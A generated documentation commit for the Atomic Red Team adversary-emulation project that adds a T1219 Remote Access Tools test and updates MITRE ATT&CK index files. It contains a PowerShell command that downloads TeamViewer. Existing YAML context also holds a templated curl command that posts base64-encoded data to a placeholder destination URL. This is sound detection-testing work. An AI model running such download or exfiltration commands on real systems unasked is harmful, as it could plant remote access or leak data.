Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
CircleCI Atomic Red Team doc generator
parent
381ba9d449
commit
fbc458a342
@@ -0,0 +1,34 @@
|
||||
# T1219 - Remote Access Tools
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1219)
|
||||
<blockquote>An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
||||
|
||||
Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
|
||||
|
||||
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - TeamViewer Files Detected Test on Windows](#atomic-test-1---teamviewer-files-detected-test-on-windows)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - TeamViewer Files Detected Test on Windows
|
||||
An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
```
|
||||
$client = new-object System.Net.WebClient
|
||||
$client.DownloadFile("https://download.teamviewer.com/download/TeamViewer_Setup.exe","C:\tmp\teamviewer.exe")
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
File diff suppressed because one or more lines are too long
+2
-1
@@ -953,7 +953,8 @@
|
||||
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1219 Remote Access Tools](./T1219/T1219.md)
|
||||
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
|
||||
- [T1105 Remote File Copy](./T1105/T1105.md)
|
||||
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
|
||||
|
||||
+104
-37
@@ -26860,59 +26860,57 @@ command-and-control:
|
||||
'':
|
||||
technique:
|
||||
x_mitre_data_sources:
|
||||
- Network intrusion detection system
|
||||
- Network protocol analysis
|
||||
- Process use of network
|
||||
- Process monitoring
|
||||
- Packet capture
|
||||
- Netflow/Enclave netflow
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
name: Remote Access Tools
|
||||
description: |-
|
||||
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
||||
|
||||
Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
|
||||
|
||||
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)
|
||||
id: attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7
|
||||
x_mitre_contributors:
|
||||
- Matt Kelly, @breakersall
|
||||
name: Port Knocking
|
||||
description: "Port Knocking is a well-established method used by both defenders
|
||||
and adversaries to hide open ports from access. To enable a port, an adversary
|
||||
sends a series of packets with certain characteristics before the port will
|
||||
be opened. Usually this series of packets consists of attempted connections
|
||||
to a predefined sequence of closed ports, but can involve unusual flags, specific
|
||||
strings or other unique characteristics. After the sequence is completed,
|
||||
opening a port is often accomplished by the host based firewall, but could
|
||||
also be implemented by custom software. \n\nThis technique has been observed
|
||||
to both for the dynamic opening of a listening port as well as the initiating
|
||||
of a connection to a listening server on a different system.\n\nThe observation
|
||||
of the signal packets to trigger the communication can be conducted through
|
||||
different methods. One means, originally implemented by Cd00r (Citation: Hartrell
|
||||
cd00r 2002), is to use the libpcap libraries to sniff for the packets in question.
|
||||
Another method leverages raw sockets, which enables the malware to use ports
|
||||
that are already open for use by other programs."
|
||||
id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
|
||||
modified: '2019-07-18T17:11:15.521Z'
|
||||
x_mitre_platforms:
|
||||
- Linux
|
||||
- Windows
|
||||
- macOS
|
||||
object_marking_refs:
|
||||
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
|
||||
x_mitre_version: '1.0'
|
||||
x_mitre_version: '1.1'
|
||||
type: attack-pattern
|
||||
x_mitre_detection: |-
|
||||
Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.
|
||||
|
||||
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.
|
||||
|
||||
[Domain Fronting](https://attack.mitre.org/techniques/T1172) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.
|
||||
x_mitre_detection: Record network packets sent to and from the system, looking
|
||||
for extraneous packets that do not belong to established flows.
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
x_mitre_network_requirements: true
|
||||
created: '2018-04-18T17:59:24.739Z'
|
||||
kill_chain_phases:
|
||||
- kill_chain_name: mitre-attack
|
||||
phase_name: defense-evasion
|
||||
- kill_chain_name: mitre-attack
|
||||
phase_name: persistence
|
||||
- kill_chain_name: mitre-attack
|
||||
phase_name: command-and-control
|
||||
external_references:
|
||||
- external_id: T1219
|
||||
- external_id: T1205
|
||||
source_name: mitre-attack
|
||||
url: https://attack.mitre.org/techniques/T1219
|
||||
- source_name: Symantec Living off the Land
|
||||
description: Wueest, C., Anand, H. (2017, July). Living off the land and fileless
|
||||
attack techniques. Retrieved April 10, 2018.
|
||||
url: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf
|
||||
- source_name: CrowdStrike 2015 Global Threat Report
|
||||
description: CrowdStrike Intelligence. (2016). 2015 Global Threat Report.
|
||||
Retrieved April 11, 2018.
|
||||
url: https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf
|
||||
- source_name: CrySyS Blog TeamSpy
|
||||
description: CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’
|
||||
tolko s razreshenija S-a. Retrieved April 11, 2018.
|
||||
url: https://blog.crysys.hu/2013/03/teamspy/
|
||||
modified: '2019-07-18T17:42:08.766Z'
|
||||
url: https://attack.mitre.org/techniques/T1205
|
||||
- source_name: Hartrell cd00r 2002
|
||||
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
|
||||
backdoor. Retrieved October 13, 2018.'
|
||||
url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
|
||||
x_mitre_defense_bypassed:
|
||||
- Defensive network service scanning
|
||||
atomic_tests: []
|
||||
T1090:
|
||||
technique:
|
||||
@@ -27104,6 +27102,75 @@ command-and-control:
|
||||
command: |
|
||||
echo -n 111-11-1111 | base64
|
||||
curl -XPOST #{base64_data}.#{destination_url}
|
||||
T1219:
|
||||
technique:
|
||||
x_mitre_data_sources:
|
||||
- Network intrusion detection system
|
||||
- Network protocol analysis
|
||||
- Process use of network
|
||||
- Process monitoring
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
name: Remote Access Tools
|
||||
description: |-
|
||||
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
||||
|
||||
Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
|
||||
|
||||
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)
|
||||
id: attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7
|
||||
x_mitre_contributors:
|
||||
- Matt Kelly, @breakersall
|
||||
x_mitre_platforms:
|
||||
- Linux
|
||||
- Windows
|
||||
- macOS
|
||||
object_marking_refs:
|
||||
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
|
||||
x_mitre_version: '1.0'
|
||||
type: attack-pattern
|
||||
x_mitre_detection: |-
|
||||
Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.
|
||||
|
||||
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.
|
||||
|
||||
[Domain Fronting](https://attack.mitre.org/techniques/T1172) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
x_mitre_network_requirements: true
|
||||
created: '2018-04-18T17:59:24.739Z'
|
||||
kill_chain_phases:
|
||||
- kill_chain_name: mitre-attack
|
||||
phase_name: command-and-control
|
||||
external_references:
|
||||
- external_id: T1219
|
||||
source_name: mitre-attack
|
||||
url: https://attack.mitre.org/techniques/T1219
|
||||
- source_name: Symantec Living off the Land
|
||||
description: Wueest, C., Anand, H. (2017, July). Living off the land and fileless
|
||||
attack techniques. Retrieved April 10, 2018.
|
||||
url: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf
|
||||
- source_name: CrowdStrike 2015 Global Threat Report
|
||||
description: CrowdStrike Intelligence. (2016). 2015 Global Threat Report.
|
||||
Retrieved April 11, 2018.
|
||||
url: https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf
|
||||
- source_name: CrySyS Blog TeamSpy
|
||||
description: CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’
|
||||
tolko s razreshenija S-a. Retrieved April 11, 2018.
|
||||
url: https://blog.crysys.hu/2013/03/teamspy/
|
||||
modified: '2019-07-18T17:42:08.766Z'
|
||||
identifier: T1219
|
||||
atomic_tests:
|
||||
- name: TeamViewer Files Detected Test on Windows
|
||||
description: "An adversary may attempt to trick the user into downloading teamviewer
|
||||
and using this to maintain access to the machine. \n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
$client = new-object System.Net.WebClient
|
||||
$client.DownloadFile("https://download.teamviewer.com/download/TeamViewer_Setup.exe","C:\tmp\teamviewer.exe")
|
||||
T1105:
|
||||
technique:
|
||||
x_mitre_data_sources:
|
||||
|
||||
@@ -298,7 +298,7 @@
|
||||
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1219 Remote Access Tools](./T1219/T1219.md)
|
||||
- [T1105 Remote File Copy](./T1105/T1105.md)
|
||||
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
|
||||
|
||||
@@ -16,7 +16,7 @@
|
||||
| | | [Server Software Component](./T1505/T1505.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](./T1518/T1518.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Setuid and Setgid](./T1166/T1166.md) | | [Indicator Removal on Host](./T1070/T1070.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Systemd Service](./T1501/T1501.md) | | [Install Root Certificate](./T1130/T1130.md) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Trap](./T1154/T1154.md) | | [Masquerading](./T1036/T1036.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Trap](./T1154/T1154.md) | | [Masquerading](./T1036/T1036.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | [Remote Access Tools](./T1219/T1219.md) |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](./T1027/T1027.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Remote File Copy](./T1105/T1105.md) |
|
||||
| | | [Web Shell](./T1100/T1100.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
|
||||
| | | | | [Process Injection](./T1055/T1055.md) | | | | | | [Standard Cryptographic Protocol](./T1032/T1032.md) |
|
||||
|
||||
@@ -322,7 +322,7 @@
|
||||
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1219 Remote Access Tools](./T1219/T1219.md)
|
||||
- [T1105 Remote File Copy](./T1105/T1105.md)
|
||||
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
|
||||
|
||||
@@ -16,7 +16,7 @@
|
||||
| | | Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Web Shell](./T1100/T1100.md) | [Hidden Files and Directories](./T1158/T1158.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](./T1063/T1063.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Logon Scripts](./T1037/T1037.md) | | [Hidden Users](./T1147/T1147.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](./T1518/T1518.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Plist Modification](./T1150/T1150.md) | | [Hidden Window](./T1143/T1143.md) | | [System Information Discovery](./T1082/T1082.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | [Remote Access Tools](./T1219/T1219.md) |
|
||||
| | | [Rc.common](./T1163/T1163.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | [Remote File Copy](./T1105/T1105.md) |
|
||||
| | | [Re-opened Applications](./T1164/T1164.md) | | [Install Root Certificate](./T1130/T1130.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
|
||||
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Cryptographic Protocol](./T1032/T1032.md) |
|
||||
|
||||
+1
-1
@@ -16,7 +16,7 @@
|
||||
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File System Permissions Weakness](./T1044/T1044.md) | [Connection Proxy](./T1090/T1090.md) | [Input Prompt](./T1141/T1141.md) | [Permission Groups Discovery](./T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](./T1113/T1113.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [Launchctl](./T1152/T1152.md) | [Create Account](./T1136/T1136.md) | [Hooking](./T1179/T1179.md) | [Control Panel Items](./T1196/T1196.md) | [Kerberoasting](./T1208/T1208.md) | [Process Discovery](./T1057/T1057.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [Local Job Scheduling](./T1168/T1168.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | [Image File Execution Options Injection](./T1183/T1183.md) | [DCShadow](./T1207/T1207.md) | [Keychain](./T1142/T1142.md) | [Query Registry](./T1012/T1012.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [Mshta](./T1170/T1170.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [Mshta](./T1170/T1170.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](./T1018/T1018.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Remote Access Tools](./T1219/T1219.md) |
|
||||
| | [PowerShell](./T1086/T1086.md) | [Emond](./T1519/T1519.md) | [New Service](./T1050/T1050.md) | [DLL Side-Loading](./T1073/T1073.md) | [Network Sniffing](./T1040/T1040.md) | [Security Software Discovery](./T1063/T1063.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Remote File Copy](./T1105/T1105.md) |
|
||||
| | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](./T1502/T1502.md) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Password Filter DLL](./T1174/T1174.md) | [Software Discovery](./T1518/T1518.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
|
||||
| | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](./T1044/T1044.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | [Private Keys](./T1145/T1145.md) | [System Information Discovery](./T1082/T1082.md) | [Windows Admin Shares](./T1077/T1077.md) | | | [Standard Cryptographic Protocol](./T1032/T1032.md) |
|
||||
|
||||
@@ -707,7 +707,8 @@
|
||||
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1219 Remote Access Tools](./T1219/T1219.md)
|
||||
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
|
||||
- [T1105 Remote File Copy](./T1105/T1105.md)
|
||||
- Atomic Test #7: certutil download (urlcache) [windows]
|
||||
- Atomic Test #8: certutil download (verifyctl) [windows]
|
||||
|
||||
@@ -15,7 +15,7 @@
|
||||
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | [Control Panel Items](./T1196/T1196.md) | [Kerberoasting](./T1208/T1208.md) | [Process Discovery](./T1057/T1057.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](./T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [Mshta](./T1170/T1170.md) | [Create Account](./T1136/T1136.md) | [New Service](./T1050/T1050.md) | [DCShadow](./T1207/T1207.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](./T1012/T1012.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [PowerShell](./T1086/T1086.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | [Parent PID Spoofing](./T1502/T1502.md) | [DLL Search Order Hijacking](./T1038/T1038.md) | [Network Sniffing](./T1040/T1040.md) | [Remote System Discovery](./T1018/T1018.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](./T1073/T1073.md) | [Password Filter DLL](./T1174/T1174.md) | [Security Software Discovery](./T1063/T1063.md) | [Windows Admin Shares](./T1077/T1077.md) | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [Regsvcs/Regasm](./T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](./T1073/T1073.md) | [Password Filter DLL](./T1174/T1174.md) | [Security Software Discovery](./T1063/T1063.md) | [Windows Admin Shares](./T1077/T1077.md) | | | [Remote Access Tools](./T1219/T1219.md) |
|
||||
| | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](./T1044/T1044.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Private Keys](./T1145/T1145.md) | [Software Discovery](./T1518/T1518.md) | [Windows Remote Management](./T1028/T1028.md) | | | [Remote File Copy](./T1105/T1105.md) |
|
||||
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [PowerShell Profile](./T1504/T1504.md) | [Disabling Security Tools](./T1089/T1089.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
|
||||
| | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | [Process Injection](./T1055/T1055.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](./T1016/T1016.md) | | | | [Standard Cryptographic Protocol](./T1032/T1032.md) |
|
||||
|
||||
Reference in New Issue
Block a user